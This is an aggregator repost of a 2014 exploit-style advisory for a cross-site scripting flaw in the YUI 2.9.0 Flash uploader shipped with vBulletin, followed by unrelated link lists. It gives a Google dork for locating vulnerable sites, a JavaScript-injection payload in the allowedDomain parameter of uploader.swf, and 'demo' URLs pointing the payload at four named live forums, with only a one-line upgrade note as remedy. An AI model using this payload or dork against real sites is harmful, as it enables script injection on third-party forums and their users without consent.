Channel: MondoUnix » ASSETS

vBulletin YUI 2.9.0 Cross Site Scripting

January 11, 2014, 5:05 am

≪ Previous: Joomla Melody Cross Site Scripting

[+] Author: TUNISIAN CYBER
[+] Exploit Title: vBulletin YUI 2.9.0 Cross Site Scripting vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"clientscript/yui/uploader/assets/"
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com
 
########################################################################################
+Description:
YUI is a free, open source JavaScript and CSS library for building richly interactive web applications.
Used by vBulletin.
+Exploit:
YUI suffers from an xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
 
Demo:
http://fansfoot.com/forum/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.liveworkshop.com/forums/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.mjjcommunity.com/forum/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.wivesbehindthebadge.org/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
 
Patch:
Upgarde to 3.X Version.
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

(917)

↧

↧

Latest Images

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

April 18, 2024, 11:05 am

Photographer Gifts for Clients / Print Packaging / 4x6 Photo Box by...

Photographer Gifts for Clients / Print Packaging / 4x6 Photo Box by...

April 17, 2024, 6:48 pm

Deepfake Video of Aamir Khan circulates Online

Deepfake Video of Aamir Khan circulates Online

April 17, 2024, 3:07 am

Very Hungry Caterpillar™ Shirt: World of Eric Carle™+ Little Goodall by...

Very Hungry Caterpillar™ Shirt: World of Eric Carle™+ Little Goodall by...

April 14, 2024, 8:14 am

Have you seen Michael Wines? Burien man has been missing since Saturday,...

Have you seen Michael Wines? Burien man has been missing since Saturday,...

April 12, 2024, 3:59 pm

Stay Salty POTS Awareness Stretchy Stacking Bracelets | Set of Three|...

Stay Salty POTS Awareness Stretchy Stacking Bracelets | Set of Three|...

April 11, 2024, 5:27 pm

19 Reader-Favourite March Purchases — From Steals To Splurges

19 Reader-Favourite March Purchases — From Steals To Splurges

April 11, 2024, 5:07 am

Fake lip ring, silver lip ring, simple lip ring, unisex lip ring by AIRlab

Fake lip ring, silver lip ring, simple lip ring, unisex lip ring by AIRlab

April 9, 2024, 4:00 pm

People's Blog • First Pictures of the Eclipse ! ! !

People's Blog • First Pictures of the Eclipse ! ! !

April 8, 2024, 1:08 pm

People's Blog • First Pictures of the Eclipse ! ! !

People's Blog • First Pictures of the Eclipse ! ! !

April 8, 2024, 1:08 pm

Trending Articles

100+ Short Whatsapp Status in English | Short Status Quotes Words

March 22, 2017, 12:27 am

TPS23861: SDAI and SDAO

June 28, 2017, 10:39 pm

Appeal judge tells killer Kevin Spires ‘go back to jail and serve out your...

January 30, 2014, 1:30 am

Blood-C (Dual Audio) (2011) [CBM] [BDRip] [HD 720p]

July 28, 2013, 2:05 am

In 1952, Hindi film songs were banned on All India Radio

July 14, 2018, 5:30 pm

Revised GDS Gratuity, Severance Amount and SDBS contribution - Social...

June 27, 2018, 9:01 pm

Jina la mtoto wa kike linaloanza na herufi "G"

August 14, 2017, 1:31 pm

Happy Birthday Wishes for Bhabhi in Hindi & English |हैप्पी बर्थडे भाभी

March 13, 2020, 3:01 am

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

Warangal Rural District Administration Officers Contact Mobile Numbers In...

June 5, 2017, 3:30 am

Windows Update / Microsoft Update の接続先 URL について

February 27, 2017, 12:32 am

Dagadi Chaawl 2015 Dual Audio 720p HDRip [Hindi – Marathi] – UNCUT

June 21, 2016, 5:37 pm

Online Grading System with Grade Viewing Capstone Project

February 27, 2019, 2:08 am

BSTweaker 5.16.1 (Portable) - The Bluestack Tweaker Tool | =-TeamOS-=...

March 27, 2020, 6:37 am

Anchors List (Female Male) of Zee News Channel with Full Biop/Detail ,Pictures

February 5, 2017, 9:06 am

How to win at Markstrat (Markstrat Tips and Tricks) – Market Forecast and...

November 25, 2013, 7:04 pm

Pengalaman Rawatan di Klinik Dr. Ko

October 15, 2021, 7:41 am

Kala Chashma (Baar Baar Dekho) MP3 Song

July 26, 2016, 8:55 am

Lirik Lagu Rohani Kristen Kasih - Kapata

April 3, 2014, 2:49 am

Chal chalo chalo lyrics and translation | S/O Sathyamurthy (2015)

March 17, 2015, 4:04 am

More Pages to Explore .....

Latest Images

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

April 18, 2024, 11:05 am

Photographer Gifts for Clients / Print Packaging / 4x6 Photo Box by...

Photographer Gifts for Clients / Print Packaging / 4x6 Photo Box by...

April 17, 2024, 6:48 pm

Deepfake Video of Aamir Khan circulates Online

Deepfake Video of Aamir Khan circulates Online

April 17, 2024, 3:07 am

Very Hungry Caterpillar™ Shirt: World of Eric Carle™+ Little Goodall by...

Very Hungry Caterpillar™ Shirt: World of Eric Carle™+ Little Goodall by...

April 14, 2024, 8:14 am

Have you seen Michael Wines? Burien man has been missing since Saturday,...

Have you seen Michael Wines? Burien man has been missing since Saturday,...

April 12, 2024, 3:59 pm

Stay Salty POTS Awareness Stretchy Stacking Bracelets | Set of Three|...

Stay Salty POTS Awareness Stretchy Stacking Bracelets | Set of Three|...

April 11, 2024, 5:27 pm

19 Reader-Favourite March Purchases — From Steals To Splurges

19 Reader-Favourite March Purchases — From Steals To Splurges

April 11, 2024, 5:07 am

Fake lip ring, silver lip ring, simple lip ring, unisex lip ring by AIRlab

Fake lip ring, silver lip ring, simple lip ring, unisex lip ring by AIRlab

April 9, 2024, 4:00 pm

People's Blog • First Pictures of the Eclipse ! ! !

People's Blog • First Pictures of the Eclipse ! ! !

April 8, 2024, 1:08 pm

People's Blog • First Pictures of the Eclipse ! ! !

People's Blog • First Pictures of the Eclipse ! ! !

April 8, 2024, 1:08 pm

© 2024 //www.rssing.com